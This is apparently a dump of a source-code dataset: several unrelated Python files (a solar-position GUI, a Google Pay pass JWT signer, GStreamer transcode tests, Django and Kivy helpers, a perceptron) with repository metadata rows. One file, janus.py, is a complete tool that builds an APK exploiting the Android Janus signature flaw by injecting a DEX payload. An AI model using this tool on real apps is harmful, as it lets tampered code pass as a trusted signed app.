global TOT_SECONDS , JULIANSDAY, HORA_MANUAL
global HOUR, MINUTE, SECOND
global YEAR, MONTH , DAY
# Horário automático
if dpg.get_value( HORA_MANUAL ) == False :
SUN_DATA.update_date()
dpg.set_value( 23_1, value = [ dpg.get_value(YEAR), dpg.get_value(MONTH) , dpg.get_value(DAY) ] ) # DIA ATUTOMÁTICO
dpg.set_value( 23_2, value = [ dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND)] ) # HORA AUTOMÁTICA
dpg.hide_item( 23_2_0 )
dpg.show_item( 23_1_0 )
# Horário manual
else:
yearm, monthm, daym = dpg.get_value( 23_6 )[:-1]
hourm, minutem, secondm = dpg.get_value( 23_7 )[:-1]
try:
data = dt.datetime( int(yearm), int(monthm), int(daym), int(hourm), int(minutem), int(secondm) )
dt.datetime.timestamp( data )
SUN_DATA.set_date( data )
SUN_DATA.update()
dpg.set_value(YEAR , yearm )
dpg.set_value(MONTH , monthm )
dpg.set_value(DAY , daym )
dpg.set_value(HOUR , hourm )
dpg.set_value(MINUTE, minutem)
dpg.set_value(SECOND, secondm)
except:
pass
# Total de segundos no dia
dpg.set_value( 23_9, SUN_DATA.dia_juliano ) # DIA JULIANO
dpg.set_value( 23_8, SUN_DATA.total_seconds) # TOTAL DE SEGUNDOS
dpg.hide_item( 23_1_0 )
dpg.show_item( 23_2_0 )
# Setar o Azimute, Altitude e Elevação
dpg.set_value( 23_12, math.degrees( SUN_DATA.azi) ) # AZIMUTE
dpg.set_value( 23_13, math.degrees( SUN_DATA.alt) ) # ALTITUDE
dpg.set_value( 23_14, SUN_DATA.altitude ) # ELEVAÇÃO
# Seta as horas do sol calculando as horas minutos e segundos de segundos totais
diff_sunlight = (SUN_DATA.sunset - SUN_DATA.rising).seconds
dpg.set_value( 2_3_15, [diff_sunlight//3600, (diff_sunlight//60)%60 , diff_sunlight%60 ] )
# Setar as informações de Nascer do sol, Culminante (ponto mais alto) e Por do sol
dpg.set_value( 23_16, [ SUN_DATA.rising.hour+SUN_DATA.utc_local , SUN_DATA.rising.minute , SUN_DATA.rising.second ] ) # 'Nascer do sol'
dpg.set_value( 23_17, [ SUN_DATA.transit.hour+SUN_DATA.utc_local, SUN_DATA.transit.minute, SUN_DATA.transit.second ] ) # 'Culminante'
dpg.set_value( 23_18, [ SUN_DATA.sunset.hour+SUN_DATA.utc_local , SUN_DATA.sunset.minute , SUN_DATA.sunset.second ] ) # 'Por do sol'
update_sun_trajetory( draw_id = 21_1_0 , parent_id = 21_0 )
att_sunpos_graphs()
| 70.989691
| 267
| 0.554265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,651
| 0.127932
|
429cb5fb216dbdf5ec9ff71a33c2d298dd2c8210
| 4,071
|
py
|
Python
|
python/jwt.py
|
angelbarranco/passes-rest-samples
|
93f54e3e7b651bcfd1b269e2bcd5d9bf9d50ad8c
|
[
"Apache-2.0"
] | 95
|
2019-06-05T12:45:15.000Z
|
2022-03-30T14:02:27.000Z
|
python/jwt.py
|
angelbarranco/passes-rest-samples
|
93f54e3e7b651bcfd1b269e2bcd5d9bf9d50ad8c
|
[
"Apache-2.0"
] | 21
|
2019-06-18T15:41:41.000Z
|
2022-03-04T15:29:57.000Z
|
python/jwt.py
|
angelbarranco/passes-rest-samples
|
93f54e3e7b651bcfd1b269e2bcd5d9bf9d50ad8c
|
[
"Apache-2.0"
] | 45
|
2019-06-13T20:57:11.000Z
|
2022-03-21T13:43:31.000Z
|
"""
Copyright 2019 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import config
import time
# for jwt signing. see https://google-auth.readthedocs.io/en/latest/reference/google.auth.jwt.html#module-google.auth.jwt
from google.auth import crypt as cryptGoogle
from google.auth import jwt as jwtGoogle
#############################
#
# class that defines JWT format for a Google Pay Pass.
#
# to check the JWT protocol for Google Pay Passes, check:
# https://developers.google.com/pay/passes/reference/s2w-reference#google-pay-api-for-passes-jwt
#
# also demonstrates RSA-SHA256 signing implementation to make the signed JWT used
# in links and buttons. Learn more:
# https://developers.google.com/pay/passes/guides/get-started/implementing-the-api/save-to-google-pay
#
#############################
class googlePassJwt:
def __init__(self):
self.audience = config.AUDIENCE
self.type = config.JWT_TYPE
self.iss = config.SERVICE_ACCOUNT_EMAIL_ADDRESS
self.origins = config.ORIGINS
self.iat = int(time.time())
self.payload = {}
# signer for RSA-SHA256. Uses same private key used in OAuth2.0
self.signer = cryptGoogle.RSASigner.from_service_account_file(config.SERVICE_ACCOUNT_FILE)
def addOfferClass(self, resourcePayload):
self.payload.setdefault('offerClasses',[])
self.payload['offerClasses'].append(resourcePayload)
def addOfferObject(self, resourcePayload):
self.payload.setdefault('offerObjects',[])
self.payload['offerObjects'].append(resourcePayload)
def addLoyaltyClass(self, resourcePayload):
self.payload.setdefault('loyaltyClasses',[])
self.payload['loyaltyClasses'].append(resourcePayload)
def addLoyaltyObject(self, resourcePayload):
self.payload.setdefault('loyaltyObjects',[])
self.payload['loyaltyObjects'].append(resourcePayload)
def addGiftcardClass(self, resourcePayload):
self.payload.setdefault('giftCardClasses',[])
self.payload['giftCardClasses'].append(resourcePayload)
def addGiftcardObject(self, resourcePayload):
self.payload.setdefault('giftCardObjects',[])
self.payload['giftCardObjects'].append(resourcePayload)
def addEventTicketClass(self, resourcePayload):
self.payload.setdefault('eventTicketClasses',[])
self.payload['eventTicketClasses'].append(resourcePayload)
def addEventTicketObject(self, resourcePayload):
self.payload.setdefault('eventTicketObjects',[])
self.payload['eventTicketObjects'].append(resourcePayload)
def addFlightClass(self, resourcePayload):
self.payload.setdefault('flightClasses',[])
self.payload['flightClasses'].append(resourcePayload)
def addFlightObject(self, resourcePayload):
self.payload.setdefault('flightObjects',[])
self.payload['flightObjects'].append(resourcePayload)
def addTransitClass(self, resourcePayload):
self.payload.setdefault('transitClasses',[])
self.payload['transitClasses'].append(resourcePayload)
def addTransitObject(self, resourcePayload):
self.payload.setdefault('transitObjects',[])
self.payload['transitObjects'].append(resourcePayload)
def generateUnsignedJwt(self):
unsignedJwt = {}
unsignedJwt['iss'] = self.iss
unsignedJwt['aud'] = self.audience
unsignedJwt['typ'] = self.type
unsignedJwt['iat'] = self.iat
unsignedJwt['payload'] = self.payload
unsignedJwt['origins'] = self.origins
return unsignedJwt
def generateSignedJwt(self):
jwtToSign = self.generateUnsignedJwt()
signedJwt = jwtGoogle.encode(self.signer, jwtToSign)
return signedJwt
| 35.4
| 121
| 0.747237
| 2,751
| 0.675755
| 0
| 0
| 0
| 0
| 0
| 0
| 1,680
| 0.412675
|
429ce61086d20c4c1d15d20e5249184bf0cc61e3
| 4,714
|
py
|
Python
|
janus.py
|
caxmd/januus
|
79208e2450b4c5b1c81346b99814462f6d083b66
|
[
"MIT"
] | 83
|
2017-12-11T03:33:10.000Z
|
2022-02-17T15:13:54.000Z
|
janus.py
|
caxmd/januus
|
79208e2450b4c5b1c81346b99814462f6d083b66
|
[
"MIT"
] | 3
|
2017-12-25T16:15:44.000Z
|
2018-06-17T11:06:08.000Z
|
janus.py
|
caxmd/januus
|
79208e2450b4c5b1c81346b99814462f6d083b66
|
[
"MIT"
] | 25
|
2017-12-11T03:51:12.000Z
|
2022-02-17T15:13:57.000Z
|
# Includes some code derived from the cpython project.
# Source: https://github.com/python/cpython/blob/master/Lib/zipfile.py
# Excuse the mess.
import argparse
from hashlib import sha1
import os
import struct
from zipfile import _EndRecData, ZipFile
from zlib import adler32
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
structEndArchive = b"<4s4H2LH"
stringEndArchive = b"PK\005\006"
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = b"PK\001\002"
_DEX_MAGIC = 0
_DEX_CHECKSUM = 1
_DEX_SIGNATURE = 2
_DEX_FILE_SIZE = 3
structDexHeader = "<8sI20sI"
def get_centdirs(filelist):
arr = b""
for zinfo in filelist:
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
file_size = zinfo.file_size
compress_size = zinfo.compress_size
header_offset = zinfo.header_offset
extra_data = zinfo.extra
min_version = 0
extract_version = max(min_version, zinfo.extract_version)
create_version = max(min_version, zinfo.create_version)
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
arr += centdir
arr += filename
arr += extra_data
arr += zinfo.comment
return arr
def pack_endrec(endrec):
return struct.pack(
structEndArchive,
endrec[_ECD_SIGNATURE],
endrec[_ECD_DISK_NUMBER],
endrec[_ECD_DISK_START],
endrec[_ECD_ENTRIES_THIS_DISK],
endrec[_ECD_ENTRIES_TOTAL],
endrec[_ECD_SIZE],
endrec[_ECD_OFFSET],
endrec[_ECD_COMMENT_SIZE]
)
def get_endrec(file):
pos = file.tell()
endrec = _EndRecData(file)
file.seek(pos)
return endrec
def sort_info(info):
if info.filename.startswith("META-INF"):
return "Z"
else:
return "A"
def get_dex_header(data):
return list(struct.unpack(structDexHeader, data[0:0x24]))
def pack_dex_header(header):
return struct.pack(
structDexHeader,
header[_DEX_MAGIC],
header[_DEX_CHECKSUM],
header[_DEX_SIGNATURE],
header[_DEX_FILE_SIZE]
)
def make_dex_header(header, file_data, final_size):
header[_DEX_FILE_SIZE] = final_size
packed_header = pack_dex_header(header)
signature = sha1()
signature.update(packed_header[0x20:] + file_data)
header[_DEX_SIGNATURE] = signature.digest()
header[_DEX_CHECKSUM] = adler32(
header[_DEX_SIGNATURE] +
packed_header[0x20:] +
file_data
)
return pack_dex_header(header)
parser = argparse.ArgumentParser(description="Creates an APK exploiting the Janus vulnerability.")
parser.add_argument("apk_in", metavar="original-apk", type=str,
help="the source apk to use")
parser.add_argument("dex_in", metavar="dex-file", type=str,
help="the dex file to prepend")
parser.add_argument("apk_out", metavar="output-apk", type=str,
help="the file to output to")
args = parser.parse_args()
with ZipFile(args.apk_in, "r") as apk_in_zip, open(args.apk_in, "rb") as apk_in, open(args.dex_in, "rb") as dex_in, open(args.apk_out, "wb") as apk_out:
dex_data = dex_in.read()
dex_header = get_dex_header(dex_data)
dex_size = os.path.getsize(args.dex_in)
orig_endrec = get_endrec(apk_in)
new_endrec = get_endrec(apk_in)
new_endrec[_ECD_OFFSET] = new_endrec[_ECD_OFFSET] + dex_size
final_size = os.path.getsize(args.apk_in) + dex_size
apk_in_zip.filelist = sorted(apk_in_zip.filelist, key=sort_info)
infolist = apk_in_zip.infolist()
for info in infolist:
info.date_time = (2042, 14, 3, 0, 62, 18)
info.header_offset = info.header_offset + dex_size
out_bytes = b""
out_bytes += dex_data[0x24:]
out_bytes += apk_in.read()[:orig_endrec[_ECD_OFFSET]]
out_bytes += get_centdirs(infolist)
out_bytes += pack_endrec(new_endrec)
out_bytes = make_dex_header(dex_header, out_bytes, final_size) + out_bytes
apk_out.write(out_bytes)
| 31.218543
| 152
| 0.655282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 426
| 0.090369
|
429cf2c16bb83449ca0bd5d3338a9cac6d753159
| 74
|
py
|
Python
|
constants.py
|
phy1um/tmtc-discord-bot
|
7d01cd4c1a78dc0b8aa2bb703c8970ff7bb27f92
|
[
"MIT"
] | null | null | null |
constants.py
|
phy1um/tmtc-discord-bot
|
7d01cd4c1a78dc0b8aa2bb703c8970ff7bb27f92
|
[
"MIT"
] | null | null | null |
constants.py
|
phy1um/tmtc-discord-bot
|
7d01cd4c1a78dc0b8aa2bb703c8970ff7bb27f92
|
[
"MIT"
] | null | null | null |
ANNOUNCEMENT_ROLE = "941805571915513857"
GUILD_ID = "878926572235665418"
| 18.5
| 40
| 0.824324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.540541
|
429eedb68c601680755c430f3d242a23508963a5
| 3,352
|
py
|
Python
|
test/gst-msdk/transcode/mpeg2.py
|
haribommi/vaapi-fits
|
cbf2a463bd3b2c9af5c45a1376b0bde2b703ed23
|
[
"BSD-3-Clause"
] | null | null | null |
test/gst-msdk/transcode/mpeg2.py
|
haribommi/vaapi-fits
|
cbf2a463bd3b2c9af5c45a1376b0bde2b703ed23
|
[
"BSD-3-Clause"
] | null | null | null |
test/gst-msdk/transcode/mpeg2.py
|
haribommi/vaapi-fits
|
cbf2a463bd3b2c9af5c45a1376b0bde2b703ed23
|
[
"BSD-3-Clause"
] | null | null | null |
##
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###
from ....lib import *
from ..util import *
from .transcoder import TranscoderTest
spec = load_test_spec("mpeg2", "transcode")
class to_avc(TranscoderTest):
@slash.requires(*have_gst_element("msdkh264enc"))
@slash.requires(*have_gst_element("msdkh264dec"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "avc", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(AVC_ENCODE_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'h264',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_h264',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkh264enc ! video/x-h264,profile=main ! h264parse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'h264parse ! msdkh264dec',
)
self.transcode_1to1()
class to_hevc(TranscoderTest):
@slash.requires(*have_gst_element("msdkh265enc"))
@slash.requires(*have_gst_element("msdkh265dec"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "hevc", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(HEVC_ENCODE_8BIT_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'h265',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_h265',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkh265enc ! video/x-h265,profile=main ! h265parse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'h265parse ! msdkh265dec',
)
self.transcode_1to1()
class to_mjpeg(TranscoderTest):
@slash.requires(*have_gst_element("msdkmjpegenc"))
@slash.requires(*have_gst_element("msdkmjpegdec"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "mjpeg", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(JPEG_ENCODE_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'mjpeg',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_mjpeg',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkmjpegenc ! jpegparse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'jpegparse ! msdkmjpegdec',
)
self.transcode_1to1()
class to_mpeg2(TranscoderTest):
@slash.requires(*have_gst_element("msdkmpeg2enc"))
@slash.requires(*have_gst_element("msdkmpeg2dec"))
@slash.parametrize(*gen_transcode_1to1_parameters(spec, "mpeg2", "hwhw"))
@platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(MPEG2_ENCODE_PLATFORMS))
def test_hwhw_1to1(self, case):
vars(self).update(spec[case].copy())
vars(self).update(
dstextension = 'm2v',
case = case,
mode = 'hwhw',
trans_type = 'mpeg2_to_mpeg2',
gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkmpeg2enc ! mpegvideoparse',
gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
gstdecoder2 = 'mpegvideoparse ! msdkmpeg2dec',
)
self.transcode_1to1()
| 38.976744
| 107
| 0.683174
| 3,118
| 0.930191
| 0
| 0
| 2,985
| 0.890513
| 0
| 0
| 943
| 0.281325
|
42a05049df648190833a6dde333b459a1ed6a363
| 10,220
|
py
|
Python
|
rusel/base/context.py
|
ruslan-ok/ruslan
|
fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8
|
[
"MIT"
] | null | null | null |
rusel/base/context.py
|
ruslan-ok/ruslan
|
fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8
|
[
"MIT"
] | null | null | null |
rusel/base/context.py
|
ruslan-ok/ruslan
|
fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8
|
[
"MIT"
] | null | null | null |
import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
def set_config(self, config, cur_view):
self.config = Config(config, cur_view)
def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
context = {}
if hasattr(self, 'object') and self.object:
title = self.object.name
else:
if 'title' in kwargs:
title = kwargs['title']
else:
title = _(self.config.title).capitalize()
nav_item = None
if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
nav_item = Task.get_active_nav_item(user_id, self.config.app)
if nav_item:
title = (title, nav_item.name)
context['nav_item'] = nav_item
context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
context['fix_list'] = self.get_fixes(self.config.views, search_qty)
context['group_form'] = CreateGroupForm()
context['config'] = self.config
context['params'] = extract_get_params(self.request, self.config.group_entity)
if nav_items:
context['nav_items'] = nav_items
context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
if self.config.add_button:
context['add_item_template'] = 'base/add_item_button.html'
else:
context['add_item_template'] = 'base/add_item_input.html'
if (self.config.group_entity in self.request.GET):
context['current_group'] = self.request.GET[self.config.group_entity]
elif ('ret' in self.request.GET):
context['current_group'] = self.request.GET['ret']
return context
def get_sorts(self, sorts):
ret = []
for sort in sorts:
ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
return ret
def get_fixes(self, views, search_qty):
fixes = []
if (self.config.app == APP_ALL):
common_url = reverse('index')
else:
common_url = reverse(self.config.app + ':list')
nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
for key, value in views.items():
url = common_url
determinator = 'view'
view_id = self.config.main_view
if (view_id != key):
if ('role' in value):
determinator = 'role'
view_id = value['role']
url += view_id + '/'
else:
view_id = key
if (key != self.config.main_view):
if ('page_url' in value):
url += value['page_url'] + '/'
else:
url += '?view=' + key
if (self.config.app in FOLDER_NAV_APPS):
folder = ''
if ('folder' in self.request.GET):
folder = self.request.GET['folder']
if folder:
if ('?' in url):
url += '&'
else:
url += '?'
url += 'folder=' + folder
hide_qty = False
if ('hide_qty' in value):
hide_qty = value['hide_qty']
if hide_qty:
qty = None
else:
if (view_id == self.config.group_entity):
_nav_item = None
else:
_nav_item = nav_item
fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
qty = self.get_view_qty(fix_group, _nav_item)
active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
fix = {
'determinator': determinator,
'id': view_id,
'url': url,
'icon': value['icon'],
'title': _(value['title']).capitalize(),
'qty': qty,
'active': active,
'search_qty': search_qty,
}
fixes.append(fix)
return fixes
def get_view_qty(self, group, nav_item):
data = self.get_dataset(group, nav_item=nav_item)
return len(data)
def get_dataset(self, group, query=None, nav_item=None):
if (group.determinator == 'role'):
cur_role = group.view_id
else:
cur_role = self.config.base_role
data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
if (self.config.app == APP_ALL) and (not query):
return data
if data and ((not group.determinator) or (group.determinator == 'group')):
data = data.filter(groups__id=group.id)
# if (not group.completed):
# data = data.filter(completed=False)
if hasattr(self, 'tune_dataset'):
return self.tune_dataset(data, group)
return data
def get_nav_items(self):
nav_role = Task.get_nav_role(self.config.app)
if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
return None
href = self.request.path
if ('pk' in self.kwargs):
pk = str(self.kwargs['pk']) + '/'
if (pk in href):
href = href.split(pk)[0]
sort = 'name'
nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
if nav_item_group and nav_item_group.items_sort:
sort = nav_item_group.items_sort
ret = []
for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
ret.append({
'id': item.id,
'name': item.name,
'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
'href': href,
})
return ret
class DirContext(Context):
def get_context_data(self, **kwargs):
self.config.set_view(self.request)
self.object = None
self.cur_folder = ''
page_title = ''
title = ''
if ('folder' in self.request.GET):
self.cur_folder = self.request.GET['folder']
page_title = self.cur_folder.split('/')[-1:][0]
title = self.cur_folder
if not self.cur_folder:
page_title = _(self.config.app_title)
title = page_title
kwargs.update({'title': page_title})
dir_tree = []
self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
self.scan_files()
self.object = None
context = super().get_context_data(**kwargs)
upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
context.update(upd_context)
context['title'] = title
context['dir_tree'] = dir_tree
context['file_list'] = self.file_list
context['gps_data'] = self.gps_data
if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
context['cur_view'] = self.config.cur_view_group.view_id
context['theme_id'] = 24
context['cur_folder'] = self.cur_folder
return context
def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
ld = glob.glob(path + '/*/')
if not len(ld):
return
node = ''
level = 0
if parent:
node = parent['node']
if node:
node += '/'
node += parent['name']
level = parent['level'] + 1
s_node = node
if node:
s_node = node + '/'
p = path
for d in ld:
dd = d.replace('\\', '/')
name = dd.split(p)[1].strip('/')
x = {
'node': node,
'name': name,
'active': (cur_folder == s_node + name),
'level': level,
'qty': 0,
}
dir_tree.append(x)
if not demo:
self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)
def scan_files(self):
self.gps_data = []
self.file_list = []
with os.scandir(self.store_dir + self.cur_folder) as it:
for entry in it:
if (entry.name.upper() == 'Thumbs.db'.upper()):
continue
if entry.is_dir():
continue
ff = self.store_dir + self.cur_folder + '/' + entry.name
mt = mimetypes.guess_type(ff)
file_type = ''
if mt and mt[0]:
file_type = mt[0]
self.file_list.append({
'name': entry.name,
'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
'date': time.ctime(os.path.getmtime(ff)),
'type': file_type,
'size': self.sizeof_fmt(os.path.getsize(ff)),
})
return self.gps_data
def sizeof_fmt(self, num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return f'{num:3.1f}{unit}{suffix}'
num /= 1024.0
return f'{num:.1f}Yi{suffix}'
| 40.078431
| 196
| 0.531409
| 9,859
| 0.964677
| 0
| 0
| 0
| 0
| 0
| 0
| 946
| 0.092564
|
42a0a34d1333c63396ab8f94b968a15d8d78c49d
| 2,046
|
py
|
Python
|
deepdiy/plugins/system/debugger/debugger.py
|
IEWbgfnYDwHRoRRSKtkdyMDUzgdwuBYgDKtDJWd/diy
|
080ddece4f982f22f3d5cff8d9d82e12fcd946a1
|
[
"MIT"
] | 57
|
2019-05-01T05:27:19.000Z
|
2022-03-06T12:11:55.000Z
|
deepdiy/plugins/system/debugger/debugger.py
|
markusj1201/deepdiy
|
080ddece4f982f22f3d5cff8d9d82e12fcd946a1
|
[
"MIT"
] | 6
|
2020-01-28T22:42:22.000Z
|
2022-02-10T00:13:11.000Z
|
deepdiy/plugins/system/debugger/debugger.py
|
markusj1201/deepdiy
|
080ddece4f982f22f3d5cff8d9d82e12fcd946a1
|
[
"MIT"
] | 13
|
2019-05-08T03:19:58.000Z
|
2021-08-02T04:24:15.000Z
|
import os,rootpath
rootpath.append(pattern='main.py') # add the directory of main.py to PATH
import glob
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import ObjectProperty,DictProperty,ListProperty
from kivy.uix.boxlayout import BoxLayout
import logging,importlib,pkgutil
class Debugger(BoxLayout):
"""docstring for Debugger."""
data=ObjectProperty()
debug_packages = ListProperty()
bundle_dir = rootpath.detect(pattern='main.py') # Obtain the dir of main.py
# Builder.load_file(bundle_dir +os.sep+'ui'+os.sep+'demo.kv')
def __init__(self):
super(Debugger, self).__init__()
self.collect_debug_packages()
self.run_debug_packages()
def collect_debug_packages(self):
for importer, modname, ispkg in pkgutil.walk_packages(
path=[os.sep.join([self.bundle_dir,'plugins','system','debugger'])],
prefix='plugins.system.debugger.',
onerror=lambda x: None):
if len(modname.split('.'))>4 and '__' not in modname:
self.debug_packages.append(modname)
def run_debug_packages(self):
for modname in self.debug_packages:
try:
module=importlib.import_module(modname)
except Exception as e:
logging.warning('Fail to load debug script <{}>: {}'.format(modname,e))
# pass
# script_path_list=glob.glob(os.sep.join([
# self.bundle_dir,'plugins','system','debugger','*/']))
# module_names = ['.'.join(path.split(os.sep)[-5:-1]) for path in script_path_list]
# module_names = [name+'.'+name.split('.')[-1] for name in module_names]
# module_names = [name for name in module_names if name.split('.')[0] == 'plugins' and '__' not in name]
# for name in module_names:
# print(name)
# try:module=importlib.import_module(name)
# except Exception as e:
# logging.warning('Fail to load debug script <{}>: {}'.format(name,e))
class Test(App):
"""docstring for Test."""
data=ObjectProperty()
plugins=DictProperty()
def __init__(self):
super(Test, self).__init__()
def build(self):
demo=Debugger()
return demo
if __name__ == '__main__':
Test().run()
| 31
| 106
| 0.711632
| 1,695
| 0.828446
| 0
| 0
| 0
| 0
| 0
| 0
| 848
| 0.414467
|
42a141b9ed0d23fd4819a5a6563c8f54190ea8c2
| 1,885
|
py
|
Python
|
supervised_learning/classification/perceptron/perceptron.py
|
Ambitious-idiot/python-machine-learning
|
6c057dd64fb47de3e822b825135d24896ce13a4a
|
[
"MIT"
] | 3
|
2021-04-15T06:20:31.000Z
|
2021-05-28T05:26:06.000Z
|
supervised_learning/classification/perceptron/perceptron.py
|
Ambitious-idiot/python-machine-learning
|
6c057dd64fb47de3e822b825135d24896ce13a4a
|
[
"MIT"
] | null | null | null |
supervised_learning/classification/perceptron/perceptron.py
|
Ambitious-idiot/python-machine-learning
|
6c057dd64fb47de3e822b825135d24896ce13a4a
|
[
"MIT"
] | null | null | null |
import numpy as np
class Perceptron:
def __init__(self, weight, bias=0):
self.weight = weight
self.bias = bias
def __repr__(self):
return 'Perceptron(weight=%r, bias=%r)' % (self.weight, self.bias)
def __get_predictions(self, data):
return np.dot(data, self.weight) + self.bias
def sign(self, input_vec):
prediction = self.__get_predictions(input_vec)
if prediction < 0:
return -1
else:
return 1
def __get_misclassfied_data(self, dataset, labels):
predictions = self.__get_predictions(dataset)
misclassified_vectors = predictions * labels <= 0
misclassified_mat = dataset[misclassified_vectors]
misclassified_predictions = predictions[misclassified_vectors]
misclassified_labels = labels[misclassified_vectors]
return misclassified_mat, misclassified_labels, misclassified_predictions
def __get_loss(self, dataset, labels):
_, _, misclassified_predictions = self.__get_misclassfied_data(dataset, labels)
return abs(misclassified_predictions).sum()
def __optimize_with_sgd(self, dataset, labels, learning_rate=0.1):
misclassified_mat, misclassified_labels, misclassified_predictions \
= self.__get_misclassfied_data(dataset, labels)
rand_index = int(np.random.uniform(0, len(misclassified_labels)))
self.weight = self.weight + learning_rate * misclassified_labels[rand_index] * misclassified_mat[rand_index]
self.bias = self.bias + learning_rate * misclassified_labels[rand_index]
def train(self, dataset, labels, loops=100):
for loop in range(loops):
if self.__get_loss(dataset, labels) == 0:
break
learning_rate = 1 / (1 + loop) + 0.0001
self.__optimize_with_sgd(dataset, labels, learning_rate)
| 40.106383
| 116
| 0.682228
| 1,863
| 0.988329
| 0
| 0
| 0
| 0
| 0
| 0
| 32
| 0.016976
|
42a1c00f35b59908451cfee2563f53a899db2598
| 901
|
py
|
Python
|
pygama/dsp/_processors/trap_filter.py
|
sweigart/pygama
|
3c5fe4c69230814933b2de879b9a305ff0d4ad5e
|
[
"Apache-2.0"
] | 1
|
2022-01-19T14:31:56.000Z
|
2022-01-19T14:31:56.000Z
|
pygama/dsp/_processors/trap_filter.py
|
sweigart/pygama
|
3c5fe4c69230814933b2de879b9a305ff0d4ad5e
|
[
"Apache-2.0"
] | 1
|
2020-12-08T20:07:24.000Z
|
2020-12-08T20:07:24.000Z
|
pygama/dsp/_processors/trap_filter.py
|
sweigart/pygama
|
3c5fe4c69230814933b2de879b9a305ff0d4ad5e
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from numba import guvectorize
@guvectorize(["void(float32[:], int32, int32, float32[:])",
"void(float64[:], int32, int32, float64[:])",
"void(int32[:], int32, int32, int32[:])",
"void(int64[:], int32, int32, int64[:])"],
"(n),(),()->(n)", nopython=True, cache=True)
